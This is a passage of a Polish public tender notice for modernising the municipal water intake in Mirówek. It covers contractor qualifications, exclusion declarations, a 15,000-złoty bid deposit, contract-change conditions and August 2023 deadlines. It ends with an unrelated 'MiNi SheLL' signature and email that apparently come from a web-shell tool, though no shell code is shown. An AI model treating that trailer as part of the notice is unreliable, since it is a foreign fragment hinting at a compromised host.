wydajności, co najmniej 50 [m3/h].<br/>2) Kadra techniczna.<br/>Wykonawca winien dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się<br/>kwalifikacjami zawodowymi, doświadczeniem i wykształceniem odpowiednim do stanowisk, jakie im zostaną powierzone –<br/>zgodnie z poniższym wykazem:<br/>- co najmniej jedna osoba posiadająca uprawnienia do kierowania robotami budowlanymi o specjalności instalacyjnej w<br/>zakresie sieci, instalacji urządzeń wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, co najmniej 3 lat<br/>doświadczenia zawodowego, liczonego od momentu uzyskania uprawnień budowlanych, na stanowisku Kierownika Budowy <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia z udziału w postępowaniu:<br/>Oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275 ze. zm.) z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do<br/>tej samej grupy kapitałowej – załącznik nr 8 SWZ.<br/>Oświadczenia Wykonawcy składane na podstawie art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a) art. 108 ust 1 pkt 1 i 2 ustawy Pzp<br/>b) art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczącą wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o<br/>zaleganiu podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne.<br/>c) art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>d) art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e) art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu<br/>potwierdzenia spełniania warunków udziału w postępowaniu:<br/>1) Wykazu robót budowlanych wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w<br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane lub są wykonywane, oraz<br/>załączeniem dowodów określających, czy te roboty zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a w<br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie zgodnie z wzorem stanowiącym<br/>Załącznik nr 5 do SWZ.<br/>2) Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia– według wzoru stanowiącego Załącznika nr 6 –<br/>potwierdzającego, że:<br/>- co najmniej jedna osoba posiadająca uprawnienia do kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie<br/>sieci, instalacji urządzeń wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane,<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów, co najmniej 3 lat doświadczenia zawodowego, liczonego<br/>od momentu uzyskania uprawnień budowlanych, na stanowisku Kierownika Budowy lub Kierownika Robót, w tym, na co najmniej<br/>jedna zakończona inwestycja z zakresu budowy lub rozbudowy/modernizacji stacji uzdatniania. Należy podać nazwy inwestycji oraz<br/>Zamawiającego.<br/>- co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów, co najmniej 3 lata doświadczenia zawodowego, liczonego od momentu uzyskania uprawnień<br/>budowlanych, na stanowisku Kierownika Robót.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości:<br/>15 000,00 (słownie: piętnaście tysięcy złotych).<br/>Wadium może być wniesione w jednej lub kilku następujących formach:<br/>Pieniądzu;<br/>Gwarancjach bankowych;<br/>Gwarancjach ubezpieczeniowych;<br/>Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2023 r. poz. 462).<br/>1Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Bank<br/>Spółdzielczy Rzemiosła Oddział Radom Filia Mirów, 36 9115 0002 0000 0101 5189 0121.<br/>Tytuł przelewu: „Wadium – Znak sprawy: BG.271.17.2023 – „Rozbudowa oraz modernizacja gminnej sieci wodociągowej na<br/>terenie gminy Mirów w ramach instrumentu wsparcia zadań ważnych dla równomiernego rozwoju województwa<br/>mazowieckiego. Część II – Modernizacja gminnego ujęcia wody w miejscowości Mirówek” <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie<br/>z pełnomocnikiem <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany Umowy , na podstawie art. 455 Pzp ust 1 pkt Zmiana terminu wykonania przedmiotu<br/>umowy będzie możliwa w sytuacjach, gdy:<br/>pomimo dołożenia należytej staranności i wystąpienia z odpowiednim wyprzedzeniem, Wykonawca nie uzyska uzgodnień,<br/>opinii, warunków technicznych lub decyzji pozwalających wykonać w terminie przedmiot niniejszej umowy; 2) nastąpi<br/>zmiana stanu prawnego lub powszechnie obowiązujących przepisów prawa, mająca wpływ na realizację przedmiotu<br/>niniejszej umowy; 3) wystąpi konieczność: zmiany zakresu przedmiotu niniejszej umowy lub wykonania prac dodatkowych<br/>lub uwzględnienia wpływu innych przedsięwzięć, działań powiązanych z przedmiotem niniejszej umowy i procesem<br/>uzyskiwania prawa do dysponowania nieruchomością na cele budowlane; wystąpi konieczność wykonania zamówienia<br/>dodatkowego, które będzie miało wpływ na przedłużenie terminu wykonania przedmiotu niniejszej umowy; wystąpi<br/>konieczność wykonania robót zamiennych, które będą miały wpływ na przedłużenie terminu wykonania przedmiotu<br/>niniejszej umowy; w toku wykonywania robót ziemnych wystąpi konieczność usunięcia niewybuchów i niewypałów,<br/>wprowadzenia badań archeologicznych itp.; w toku wykonywania przedmiotu umowy wystąpią przeszkody o obiektywnym<br/>charakterze, w tym klęski żywiołowe, warunki atmosferyczne uniemożliwiające ze względów technologicznych prowadzenie<br/>robót budowlanych, przeprowadzanie prób, sprawdzeń i dokonywanie odbiorów – pomimo dołożenia przez Wykonawcę<br/>wszelkich starań, aby roboty mogły zostać zrealizowane. Na tę okoliczność Kierownik Budowy sporządzi wpis do Dziennika<br/>Budowy, który potwierdzi Inspektor Nadzoru; wystąpią nieprzewidziane warunki realizacji np.: odkrycie<br/>niezinwentaryzowanych obiektów, instalacji, które mają wpływ na roboty budowlane; wystąpi brak możliwości prowadzenia<br/>robót budowlanych z uwagi na okresy rozrodcze/lęgowe zwierząt i okresy wegetacyjne roślin; wystąpi konieczności<br/>wykonania inwentaryzacji przyrodniczej w ściśle określonym terminie (zgodnie z wymogami służb środowiskowych), mające<br/>wpływ na realizację umowy, na przebieg prac projektowych i robót budowlanych będą miały wpływ inne przyczyny<br/>zewnętrzne niezależne od Zamawiającego oraz Wykonawcy, skutkujące niemożliwością ich prowadzenia;<br/>Zmiana wynagrodzenia umownego będzie możliwa w następujących przypadkach: ulegnie zmianie urzędowa stawka VAT;<br/>wystąpi konieczność zastosowania rozwiązania projektowego zamiennego, którego nie można było przewidzieć na etapie<br/>wykonania dokumentacji projektowej, bez którego wykonanie przedmiotu umowy byłoby niemożliwe lub obarczone błędem;<br/>wystąpi konieczność zrealizowania przedmiotu niniejszej umowy przy zastosowaniu innych rozwiązań technicznych lub<br/>materiałowych ze względu na zmiany obowiązującego prawa; nastąpi konieczność zmiany zakresu przedmiotu niniejszej<br/>umowy, wykonania prac dodatkowych, których nie można było przewidzieć na etapie składania oferty przez wykonawcę,<br/>konieczność uwzględnienia wpływu innych przedsięwzięć, działań powiązanych z przedmiotem niniejszej umowy. W tym<br/>przypadku Wykonawca wykona wycenę takich robót w formie kosztorysu sporządzonego metodą szczegółową. wykonania<br/>mniejszego zakresu prac niż określony w ofercie Wykonawcy, przy czym minimalna wartość świadczenia Stron nie może<br/>być mniejsza niż 90 % wartości Umowy. Podstawą wprowadzenia zmian Umowy będzie protokół konieczności zatwierdzony<br/>przez Zamawiającego i zawarty aneks do Umowy. Zamawiający dopuszcza zmiany umowy bez przeprowadzenia nowego<br/>postępowania o udzielenie zamówienia, w przypadkach określonych w art. 455 ust. 1 pkt 2-4 oraz ust. 2 Pzp, o ile zaistniały<br/>opisane w nich okoliczności.<br/>Zamawiający dopuszcza zmiany do Umowy w przypadku zaistnienia omyłki pisarskiej lub rachunkowej, a także zmiany<br/>powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-28 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez System E-ZP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-28 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com